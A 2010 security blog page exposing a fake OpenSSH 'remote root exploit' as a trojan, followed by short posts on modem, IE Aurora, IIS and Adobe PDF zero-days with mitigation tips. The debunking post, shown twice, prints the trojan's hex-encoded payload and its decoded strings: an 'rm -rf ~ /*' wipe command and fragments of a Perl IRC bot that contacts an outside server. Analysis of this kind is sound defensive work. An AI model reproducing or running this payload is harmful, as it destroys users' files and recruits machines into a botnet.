Posted: February 7th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, fake, openssh, script kiddies, ssh | 9 Comments »
PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”
Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..
xanda:tmp adnan$ cd /tmp
xanda:tmp adnan$ mkdir lame
xanda:tmp adnan$ cd lame/
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'
100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]
xanda:lame adnan$ more openssh-53p1-remote-root.c
/* openssh-53p1-remote-root.c
* OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
* Email: root@chamillionaire.com
* Release date: Unreleased (private) / 2010
* Available Patch: No fix-patch has been issued or reported.
*
* -----------------
* Additional Notes:
* -----------------
* By using this software, you take any and/or all responsibility
* for the damage(s) caused and will not bitch to me, the|one, about it.
*
* USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
xanda:lame adnan$ strings fake | more
the|one is rooting your Linux/FreeBSD Network
Usage: %s -h <host> -p port
Options:
-h ip/host of target
-p port
-d username
-B memory_limit 8/16/64
Root is required for raw sockets, etc.
[+] the|one's OpenSSH Remote Root Exploit - 2010
[-] Resolving Failed
[-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
[-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl |
xanda:tmp adnan$ cd /tmp
xanda:tmp adnan$ mkdir lame
xanda:tmp adnan$ cd lame/
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'
100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]
xanda:lame adnan$ more openssh-53p1-remote-root.c
/* openssh-53p1-remote-root.c
* OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
* Email: root@chamillionaire.com
* Release date: Unreleased (private) / 2010
* Available Patch: No fix-patch has been issued or reported.
*
* -----------------
* Additional Notes:
* -----------------
* By using this software, you take any and/or all responsibility
* for the damage(s) caused and will not bitch to me, the|one, about it.
*
* USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
xanda:lame adnan$ strings fake | more
the|one is rooting your Linux/FreeBSD Network
Usage: %s -h <host> -p port
Options:
-h ip/host of target
-p port
-d username
-B memory_limit 8/16/64
Root is required for raw sockets, etc.
[+] the|one's OpenSSH Remote Root Exploit - 2010
[-] Resolving Failed
[-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
[-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
knock knock knock… script kiddies.. grow up!
Posted: February 6th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, billion, exploit, malaysia, modem, remote, riger, router, telekom, TM | 7 Comments »
Quick update
Here is my short update. I was playing around with the ‘nice’ modem and I found 2 vulnerability
1) Remote code execution
2) DoS
Tested on Firmware Version : 2.10.5.0(UE0.C2C)3.7.6.1
I’m looking forward to play around with Riger Corporation’s modem that came with “Enhanced by TM R&D Malaysia” label on it 🙂
Posted: January 19th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, aurora, CVE-2010-0249, DEP, exploit, IE, internet explorer, vista, windows, windows 7, xp | No Comments »
:: Quick update ::
Today, I’ve been working on a video on the Aurora IE 0day exploit PoC that really mimics the original Aurora’s exploit on Google.
However, the original exploit gonna fail if you enable DEP on the machine.
A few minutes back, someone ping and inform me on the new PoC that gonna bypass the DEP. If true, enabling DEP wont protect IE users anymore 😉
But you are still safe if you disable Active Script / JavaScript support for your IE
Here is how you can disable the Active Shit/JavaShit Active Script / JavaScript support in your IE: Advisory
Posted: December 28th, 2009 | Author: xanda | Filed under: IT Related | Tags: 0day, advisory, IIS, workaround | No Comments »
I’ve received the ‘feed’ regarding the IIS vulnerability on the 23rd December, but due to busy (preparing for examination) week, the advisory for the vulnerability is still pending.
From my observation, IIS 7 and IIS 7.5 are not vulnerable to the bug.. I already have a few working workaround for the 0day and all of them will be compiled in my upcoming advisory.. soon.. 😛
cheers!
** [Updated on Tue Dec 29 01:26:39 MYT 2009]
Done! Sent to webmaster. Waiting to be published
** [Updated on Tue Dec 29 21:33:20 MYT 2009]
Published 🙂
Posted: October 9th, 2009 | Author: xanda | Filed under: IT Related | Tags: 0day, acrobat, adobe, clientside, CVE-2009-3459, javascript, pdf | No Comments »
Nothing much but YES to agree with Didier Stevens with his statement:
PDF + JS = OMG
Yerp.. there is another vulnerability (CVE-2009-3459) in Adobe Reader and Acrobat today (GMT +8) and so far it is still 0 day..
*panic panic* What to do?
- Disable JavaScript support in Adobe Reader and Acrobat
- Enable DEP (for Windows)
- Use NoScript
- Use alternative PDF reader like Foxit, Gnome Document Viewer, yada yada..
- Don’t be a lame by opening unknown PDF attachment